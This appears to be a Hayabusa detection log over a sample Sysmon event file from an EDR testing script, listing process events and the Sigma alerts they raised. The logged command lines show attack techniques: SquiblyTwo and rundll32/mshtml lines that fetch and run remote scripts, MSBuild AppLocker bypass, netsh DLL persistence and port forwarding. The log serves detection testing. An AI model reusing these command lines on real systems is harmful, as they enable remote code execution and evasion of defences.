2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3240 | PGUID: 747F3D96-663D-5D3F-0000-00106F608A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-663D-5D3F-0000-001074658A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | LID: 0x413182 | PID: 5340 | PGUID: 747F3D96-663D-5D3F-0000-001062708A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4260 | PGUID: 747F3D96-6641-5D3F-0000-0010A38C8A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1516 | PGUID: 747F3D96-6641-5D3F-0000-001066918A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\Wmic_calc[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 5728 | PGUID: 747F3D96-6642-5D3F-0000-0010D6C98A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:56.665 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49830 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5084 | PGUID: 747F3D96-6646-5D3F-0000-0010E32E8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace show status | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4148 | PGUID: 747F3D96-6646-5D3F-0000-0010A7318B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3824 | PGUID: 747F3D96-6646-5D3F-0000-001051388B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6760 | PGUID: 747F3D96-6646-5D3F-0000-001029398B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3868 | PGUID: 747F3D96-6646-5D3F-0000-0010A7398B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace stop | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6232 | PGUID: 747F3D96-6646-5D3F-0000-0010913A8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace show status | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace show status | LID: 0x413182 | PID: 5760 | PGUID: 747F3D96-6647-5D3F-0000-0010F4648B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6647-5D3F-0000-0010AE6E8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace stop | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace stop | LID: 0x413182 | PID: 4568 | PGUID: 747F3D96-6647-5D3F-0000-001005738B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | LID: 0x413182 | PID: 5048 | PGUID: 747F3D96-6647-5D3F-0000-001065758B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | LID: 0x413182 | PID: 4028 | PGUID: 747F3D96-6647-5D3F-0000-001057768B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh.exe add helper AllTheThings.dll | LID: 0x413182 | PID: 5236 | PGUID: 747F3D96-6647-5D3F-0000-0010927C8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,PrivEsc,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5376 | PGUID: 747F3D96-6647-5D3F-0000-001052998B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6648-5D3F-0000-0010B9AB8B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat | Process: C:\Windows\System32\dispdiag.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 3704 | PGUID: 747F3D96-6648-5D3F-0000-001092BB8B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6836 | PGUID: 747F3D96-664D-5D3F-0000-0010F1498C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6056 | PGUID: 747F3D96-664D-5D3F-0000-0010114D8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 912 | PGUID: 747F3D96-664D-5D3F-0000-00108D5B8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 5572 | PGUID: 747F3D96-664D-5D3F-0000-0010BB5D8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5844 | PGUID: 747F3D96-6652-5D3F-0000-0010B9708C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5268 | PGUID: 747F3D96-6652-5D3F-0000-001059728C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication Pattern,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 4888 | PGUID: 747F3D96-6653-5D3F-0000-001083BC8C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:49831 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Evas | Exec,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1808 | PGUID: 747F3D96-6657-5D3F-0000-001029198D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2296 | PGUID: 747F3D96-6657-5D3F-0000-0010D01A8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | LID: 0x413182 | PID: 1004 | PGUID: 747F3D96-6657-5D3F-0000-001011298D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
